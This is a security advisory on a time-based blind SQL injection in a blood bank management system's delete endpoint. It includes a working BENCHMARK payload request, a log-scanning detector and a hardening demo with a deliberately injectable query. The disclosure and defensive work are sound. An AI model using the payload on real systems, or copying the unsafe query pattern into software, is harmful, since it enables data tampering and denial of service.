- BloodBank Management System: 1.0
- Vulnerability Type: SQL Injection (Time-Based Blind)
- Severity: HIGH
- Status: Unpatched
/file/delete.php?bid=6
A time-based SQL Injection vulnerability was discovered in the delete request functionality of the BloodBank Management System version 1.0. This vulnerability occurs because the bid parameter is not properly sanitized, allowing an attacker to inject malicious SQL commands into the backend database query.
This attack relies on a blind SQL injection technique, where the attacker uses time-based delays (via the MySQL BENCHMARK function) to infer whether the injected expression was evaluated. If the system delays its response, the attacker knows the SQL query was executed, allowing them to:
- Tamper with or delete sensitive records (e.g., blood bank data).
- Extract data slowly by chaining multiple queries.
- Cause Denial of Service (DoS) by overloading the system with intensive queries.
Below is a GET request demonstrating the vulnerability using a time-based SQL injection payload:
GET /file/delete.php?bid=3'%20AND%204994%3dBENCHMARK(5000000%2cMD5(0x51494778))--%20ntES HTTP/1.1
Host: localhost:8080
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/bloodinfo.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive
Once URL-decoded, the payload appends the following to the SQL query:
' AND 4994=BENCHMARK(5000000, MD5(0x51494778))-- ntES
The closing quote ends the original string literal, the AND clause is evaluated as part of the WHERE condition, and the trailing -- comments out the rest of the original query. This causes the backend to compute MD5 5,000,000 times, significantly delaying the response if the query executes. The delay confirms that the system is vulnerable to SQL injection.
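As an added illustration of the monitoring point, and not code from this advisory or from the BloodBank project, the following Python script scans web-server access-log lines for the indicators this class of request leaves behind: a bid value that is not a plain integer, a time-delay function name in the parameter, and a response that took far longer than normal. The log lines, the log format (Apache combined format with the request time in seconds appended) and the two-second threshold are constructed assumptions; the third sample line reproduces the request shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed, illustrative access-log lines: combined format with the request
# time in seconds appended. The third line carries the BENCHMARK payload quoted
# in the advisory; the others are ordinary traffic plus one malformed id.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2024:10:00:01 +0000] "GET /file/delete.php?bid=6 HTTP/1.1" 200 512 0.020
10.0.0.5 - - [01/Oct/2024:10:00:02 +0000] "GET /bloodinfo.php HTTP/1.1" 200 4096 0.015
10.0.0.9 - - [01/Oct/2024:10:00:03 +0000] "GET /file/delete.php?bid=3'%20AND%204994%3dBENCHMARK(5000000%2cMD5(0x51494778))--%20ntES HTTP/1.1" 200 512 4.870
10.0.0.9 - - [01/Oct/2024:10:00:09 +0000] "GET /file/delete.php?bid=abc HTTP/1.1" 200 512 0.018
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) (?P<secs>[\d.]+)$'
)

VULN_PATH = "/file/delete.php"           # endpoint named in the advisory
NUMERIC_ID = re.compile(r"^\d+$")        # the only shape bid should ever have
DELAY_FUNCS = re.compile(r"\b(BENCHMARK|SLEEP)\s*\(", re.IGNORECASE)
SLOW_SECONDS = 2.0                       # assumption: tune to the app's normal latency


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["secs"] = float(rec["secs"])
    return rec


def indicators_for(rec):
    """Return the list of indicator names that fire for one parsed record."""
    parts = urlsplit(rec["target"])
    if parts.path != VULN_PATH:
        return []
    # parse_qs percent-decodes, so the bid value is inspected as the server sees it
    bid = parse_qs(parts.query, keep_blank_values=True).get("bid", [""])[0]
    hits = []
    if not NUMERIC_ID.match(bid):
        hits.append("non_numeric_id")
    if DELAY_FUNCS.search(bid):
        hits.append("time_delay_function")
    if rec["secs"] > SLOW_SECONDS:
        hits.append("slow_response")
    return hits


def scan_log(text):
    """Return one finding per request that triggered at least one indicator."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None:
            continue
        hits = indicators_for(rec)
        if hits:
            findings.append({"line": lineno, "ip": rec["ip"], "indicators": hits})
    return findings


def repeat_offenders(findings, min_hits=2):
    """Sorted IPs with at least min_hits flagged requests (the repetitive-access signal)."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= min_hits)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f)
    print("repeat offenders:", repeat_offenders(found))
```

Run as a script it prints the two flagged requests and the one repeat offender. In practice the same functions would be fed the live log stream; a time_delay_function hit is worth an alert on its own, since no legitimate request to this endpoint ever contains one, while non_numeric_id alone is better treated as a counter that feeds repeat_offenders.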
- Data Integrity Compromise: Attackers can delete or modify blood bank records.
- Denial of Service (DoS): Repeated injections can exhaust system resources, making the application unresponsive.
- Unauthorized Access: Attackers can leverage this vulnerability to further explore the database and escalate privileges.
- Use Prepared Statements: Employ parameterized queries to prevent SQL injection.
- Input Validation: Validate and sanitize the bid parameter to allow only expected values (e.g., numeric IDs).
- Database Permissions: Restrict database user privileges to limit the potential damage of SQL injections.
- Monitoring & Logging: Track and alert unusual patterns, such as slow queries or repetitive access attempts.
- Security Testing: Perform regular penetration testing and code reviews to identify and mitigate vulnerabilities.
- Error Handling: Avoid exposing database-related errors in responses, which may assist attackers.
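The first three mitigations combined, as an added example rather than the project's own code: the application itself is PHP with MySQL, and this Python version uses sqlite3 as an in-memory stand-in with a constructed blood table, but the two controls (strict numeric validation before the query, and a bound parameter inside it) are the same in any stack. The vulnerable pattern, with the parameter pasted into the SQL text, is kept alongside for contrast: with the advisory's payload it reaches the database parser as SQL, whereas the hardened handler rejects it before any query runs and never leaks the database error to the client.

```python
import re
import sqlite3

# A record id may only ever be a short run of digits; anything else is rejected
# before it gets near the database.
NUMERIC_ID = re.compile(r"\d{1,10}")


def setup_demo_db():
    """Constructed in-memory stand-in for the application's blood table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE blood (bid INTEGER PRIMARY KEY, blood_group TEXT, units INTEGER)"
    )
    conn.executemany(
        "INSERT INTO blood VALUES (?, ?, ?)",
        [(3, "A+", 10), (6, "O-", 4), (7, "B+", 2)],
    )
    conn.commit()
    return conn


def delete_unsafe(conn, raw_bid):
    """The vulnerable pattern: the request parameter is interpolated into the query text,
    so a quote in the input terminates the literal and the rest is parsed as SQL."""
    cur = conn.execute(f"DELETE FROM blood WHERE bid='{raw_bid}'")
    conn.commit()
    return cur.rowcount


def delete_safe(conn, raw_bid):
    """Hardened: accept only a plain integer id, then bind it as a parameter so the
    database driver never treats the value as part of the statement."""
    if not NUMERIC_ID.fullmatch(raw_bid):
        raise ValueError("bid must be a numeric id")
    cur = conn.execute("DELETE FROM blood WHERE bid = ?", (int(raw_bid),))
    conn.commit()
    return cur.rowcount  # number of rows actually removed


def handle_delete(conn, raw_bid):
    """Request-handler shaped wrapper: validation failures become a generic 400 and
    nothing database-specific is returned to the caller."""
    try:
        deleted = delete_safe(conn, raw_bid)
    except ValueError:
        return 400, "invalid bid"
    return (200, "deleted") if deleted else (404, "no such record")


if __name__ == "__main__":
    db = setup_demo_db()
    payload = "3' AND 4994=BENCHMARK(5000000, MD5(0x51494778))-- ntES"
    print("hardened handler:", handle_delete(db, payload))
    print("valid id:", handle_delete(db, "6"))
    try:
        delete_unsafe(db, payload)
    except sqlite3.OperationalError as exc:
        # sqlite has no BENCHMARK, so the error itself shows the input was parsed as SQL
        print("vulnerable handler reached the SQL parser:", exc)
```

The regex is deliberately a whole-value match on digits only, so whitespace, signs, hex and anything with a quote are all turned away with the same 400; the bound parameter is the second, independent line of defence should a future code path skip the validation. The database user the handler runs as should additionally hold only DELETE on the tables it needs, which limits what any bypass could reach.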